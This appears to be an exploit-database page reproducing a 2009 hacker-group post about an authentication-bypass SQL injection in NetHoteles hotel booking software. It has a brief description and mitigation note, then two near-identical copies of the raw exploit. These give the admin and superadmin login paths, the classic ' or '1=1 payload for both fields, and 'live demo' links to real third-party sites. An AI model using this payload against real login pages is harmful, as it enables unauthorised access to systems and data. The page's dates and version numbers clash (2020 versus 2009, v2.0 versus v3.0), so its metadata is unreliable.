header-logo
Suggest Exploit
vendor:
NetHoteles v2.0
by:
Dns-Team
8,8
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: NetHoteles v2.0
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

NetHoteles v2.0 (Auth Bypass) Remote Sql Injection

NetHoteles v2.0 is vulnerable to authentication bypass due to improper input validation. An attacker can exploit this vulnerability by providing malicious input in the username and password fields. This will allow the attacker to bypass authentication and gain access to the application. The attacker can then use the application to perform malicious activities such as data exfiltration, privilege escalation, etc.

Mitigation:

Input validation should be implemented to ensure that only valid input is accepted. Additionally, authentication should be enforced for all users and access to sensitive data should be restricted.
Source

Exploit-DB raw data:

#############################################################################
#                                                			    #
#           NetHoteles v3.0 (Auth Bypass) Remote Sql Injecion               #
#                                                			    #
#############################################################################

#############################################################################

[~]    -=[Dns-Team Marocain Hackers]=-

[~] Author: Dns-Team

[~] Contact: Q2[at]HoTmail[dot]Fr

[~] Site: www.Scam4u.com + www.Dns-Team.com

[~] Greetz: M4n1x + Sa4d + HSMX + Stack + PR0H4CK3RZ  + N@bilX


#############################################################################

---+-- Star --+---

[~] Expl0!T -1- For SuperAdmin  :

http://site.ir/superadmin

username:  ' or '1=1
Password:  ' or '1=1

[~] L1vè Dém0 :

http://internationalhotelbooking.com/demo/superadmin/

#############################################################################

[~] Expl0!T -2- For Admin :

http://site.ir/admin

username:  ' or '1=1
Password:  ' or '1=1

[~] L1vè Dém0 :

http://internationalhotelbooking.com/demo/admin/
----------------------------------------------

---+-- End --+---

--+--> :( 4nT! Ch4T + 4nT! Girls :)<--+--
+--------:) Spam-=-Money | Hacker-+-Sport (:--------+

#############################################################################


#############################################################################
#                                                			    #
#           NetHoteles v2.0 (Auth Bypass) Remote Sql Injecion               #
#                                                			    #
#############################################################################

#############################################################################

[~]    -=[Dns-Team Marocain Hackers]=-

[~] Author: Dns-Team

[~] Contact: Q2[at]HoTmail[dot]Fr

[~] Site: www.Scam4u.com + www.Dns-Team.com

[~] Greetz: M4n1x + Sa4d + HSMX + Stack + PR0H4CK3RZ  + N@bilX


#############################################################################

---+-- Star --+---

[~] Expl0!T -1- For SuperAdmin  :

http://site.ir/superadmin

username:  ' or '1=1
Password:  ' or '1=1

[~] L1vè Dém0 :

http://www.sierracazorla.com/nethoteles/superadmin/

#############################################################################

[~] Expl0!T -2- For Admin :

http://site.ir/admin

username:  ' or '1=1
Password:  ' or '1=1

[~] L1vè Dém0 :

http://www.sierracazorla.com/nethoteles/admin/
----------------------------------------------

---+-- End --+---

--+--> :( 4nT! Ch4T + 4nT! Girls :)<--+--
+--------:) Spam-=-Money | Hacker-+-Sport (:--------+

#############################################################################

# milw0rm.com [2009-04-16]

Navigation

Suggest Exploit

Services By CQR